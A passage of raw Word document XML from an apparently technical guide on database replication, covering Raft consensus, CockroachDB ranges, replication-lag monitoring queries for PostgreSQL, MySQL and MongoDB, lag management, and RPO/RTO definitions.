        <w:t>1. All nodes start as "followers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706D1F9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>2. If a follower doesn't hear from a leader within election timeout → becomes "candidate."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB22E00" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>3. Candidate requests votes from all other nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B8919" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>4. If candidate receives majority of votes → becomes leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7486B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>5. Leader sends periodic heartbeats to maintain authority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1FD86" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>6. If leader fails → election timeout expires → new election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF7D08E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D088704" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B307D79" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>1. Client sends write to leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A3657" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>2. Leader appends entry to its log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601387F6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>3. Leader sends entry to all followers (AppendEntries RPC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853D8D5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>4. Followers append to their logs → ACK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B255DE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>5. When majority (quorum) has the entry → leader COMMITS it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B951478" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>6. Leader applies to state machine → responds to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F0BF2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>7. Followers learn of commit → apply to their state machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA2047" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Safety guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Once committed (acknowledged by a majority), an entry will NEVER be lost — even if the leader crashes. The new leader will always have all committed entries (because it must have a majority's votes, and any majority overlaps with the commit quorum).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417503B5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.3 Raft in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411C0E45" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C4CE6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>5-node Raft cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEF99C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Tolerates 2 node failures (majority = 3 still alive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA986E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write latency = max(leader_write, fastest 2 follower ACKs) ← quorum of 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476AE18" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="3801AB8E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>3-node Raft cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F4273" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Tolerates 1 node failure (majority = 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514503C7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write latency = max(leader_write, fastest 1 follower ACK) ← quorum of 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAEC681" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CockroachDB (Raft per range):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F021B34" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA79A7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Data is split into ranges (64 MB chunks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79B464" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Each range is a separate Raft group (3 or 5 replicas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A270F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Thousands of Raft groups operate independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46895645" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Leader for each range can be on different nodes → distributes write load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF7D85" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="7E3FC0A8">
          <v:rect id="_x0000_i5648" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F12BC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Replication Lag Monitoring and Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE91B5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Measuring Replication Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8BDAC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC13F10" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CF88A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- On primary: current WAL position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7BB05" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SELECT pg_current_wal_lsn();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE9672" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="5E6E4EE8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- On replica: how far behind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5FCA9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544ACC31" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  now() - pg_last_xact_replay_timestamp() AS replication_delay,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548843C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  pg_wal_lsn_diff(pg_last_wal_receive_lsn(), pg_last_wal_replay_lsn()) AS replay_lag_bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BEF53" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38FD13" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74518509" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SHOW SLAVE STATUS\G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669A0E1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Seconds_Behind_Master: estimated lag in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4DC642" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Read_Master_Log_Pos vs Exec_Master_Log_Pos: lag in binlog position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBBA8D2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294847C6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F63558" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>rs.printReplicationInfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04695693" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>rs.printSlaveReplicationInfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582B0491" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// Shows oplog window and seconds behind primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B0D3D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Managing Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117997B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling replay throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167BFA0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1537"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel replay (MySQL 5.7+):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Multiple SQL threads apply binlog events in parallel (per-database or per-transaction parallelism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F42F5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1537"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL parallel recovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Limited — single replay process, but I/O can be parallelized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74285EB5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preventing lag buildup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC63E50" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1538"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Ensure replica has equal or better I/O performance than primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5166F2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1538"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Avoid long-running queries on replica that block WAL replay (PostgreSQL: max_standby_streaming_delay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E70A43" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1538"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Monitor and alert on lag exceeding thresholds (&gt; 1 second = warning, &gt; 10 seconds = critical).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A817697" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaker pattern for reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF7F48" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2D3E3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>def read_from_replica(query, max_acceptable_lag_seconds=5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D776010" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    lag = get_replica_lag()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD3348" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if lag &gt; max_acceptable_lag_seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A953987" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        # Replica too far behind — read from primary instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CCF138" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        return primary.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564ED0E0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    return replica.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B011EB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="6ECEDDA5">
          <v:rect id="_x0000_i5649" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC3778" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Data Loss Scenarios and Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8BAEE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 RPO and RTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788091D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO (Recovery Point Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> How much data can you afford to lose?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D27068" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F1B93" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RPO = 0: No data loss acceptable (synchronous replication, consensus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641AF6B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RPO = 1 second: Can lose up to 1 second of writes (async, low lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F36D9E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RPO = 1 hour: Can lose up to 1 hour (periodic backup, high lag acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C126C1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RTO (Recovery Time Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> How quickly must you recover?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8AA94" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B4E241" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RTO = 0: No downtime (active-active, instantaneous failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158C66E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RTO = 30 seconds: Brief outage (automated failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C15CAC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>RTO = 1 hour: Extended outage (manual failover, restore from backup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D3649" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Failure Scenarios and Data Loss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851"/>
        <w:gridCol w:w="3159"/>
        <w:gridCol w:w="3340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="5FF4324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E8557B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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2403AF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sync Replication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AE2CAA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Async Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
